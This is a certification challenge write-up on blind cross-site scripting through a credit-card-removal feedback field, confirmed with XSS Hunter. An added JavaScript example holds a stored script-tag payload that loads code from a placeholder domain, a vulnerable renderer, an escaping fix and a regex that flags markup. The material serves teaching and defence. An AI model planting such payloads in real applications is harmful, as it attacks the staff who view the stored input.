Challenge 3:Case Of Client Side Code (Part 2)
This is a detailed writeup created for challenges associated with the Certified Web App Security Expert (CWAE) certification.
Challenge/Task
- Blind Cross-Site Scripting (XSS)
1. Third XSS - Blind Cross-Site Scripting (XSS)
Proof-of-Concept (POC):
Blind XSS is an attack in which we cannot see the payload execute: it is stored by the application and fires later in a context we have no access to, such as a page viewed by staff. Referring to the page below, there is a feedback field that we must fill in when we want to remove the credit card.
We want to prove the XSS using XSS Hunter, which gives us a payload that reports back when it runs. We want to know whether the payload is executed.
We send the payload and click OK. By default, our payload will be sent to the server.
To see whether our payload was successful, go to XSS Payload Fires in XSS Hunter. The XSS is executed and appears in the console.
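Added example (not part of the original writeup or the challenge application) showing why a stored feedback field is a blind XSS sink and how to close it: the submitter never sees the staff page where the text is rendered, so the vulnerable render below leaks markup into that page, while the hardened render HTML-encodes every untrusted value. The feedback entries, function names and the `looksLikeMarkup` check are constructed for this illustration.

```javascript
// Constructed sample: feedback submitted with the "remove credit card" form.
// The second entry is hostile; the callback URL is a placeholder domain.
const feedbackStore = [
  { user: "alice", reason: "Card expired, please remove it." },
  { user: "mallory", reason: '<script src="https://example.invalid/probe.js"></script>' },
];

// Vulnerable: raw string interpolation into the staff-only HTML page.
// Whatever the customer typed becomes part of the DOM the reviewer loads.
function renderAdminFeedbackVulnerable(entries) {
  return entries
    .map((e) => `<li><b>${e.user}</b>: ${e.reason}</li>`)
    .join("\n");
}

// HTML-escape for values placed in element text or quoted attributes.
function escapeHtml(s) {
  const map = { "&": "&amp;", "<": "&lt;", ">": "&gt;", '"': "&quot;", "'": "&#39;" };
  return String(s).replace(/[&<>"']/g, (c) => map[c]);
}

// Hardened: every untrusted value is encoded for the HTML context it lands in,
// so the stored text is displayed literally and no script element is created.
function renderAdminFeedbackSafe(entries) {
  return entries
    .map((e) => `<li><b>${escapeHtml(e.user)}</b>: ${escapeHtml(e.reason)}</li>`)
    .join("\n");
}

// Defender-side triage over stored feedback: flag entries that would introduce
// a tag or an inline event handler if they were ever rendered unencoded.
function looksLikeMarkup(text) {
  return /<\s*[a-z!/]/i.test(text) || /\bon[a-z]+\s*=/i.test(text);
}

function flaggedEntries(entries) {
  return entries.filter((e) => looksLikeMarkup(e.reason)).map((e) => e.user);
}
```

Output encoding is the fix that removes the sink; the `looksLikeMarkup` scan is only a review aid for data already in the database, not a substitute for encoding.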
This post is licensed under CC BY 4.0 by the author.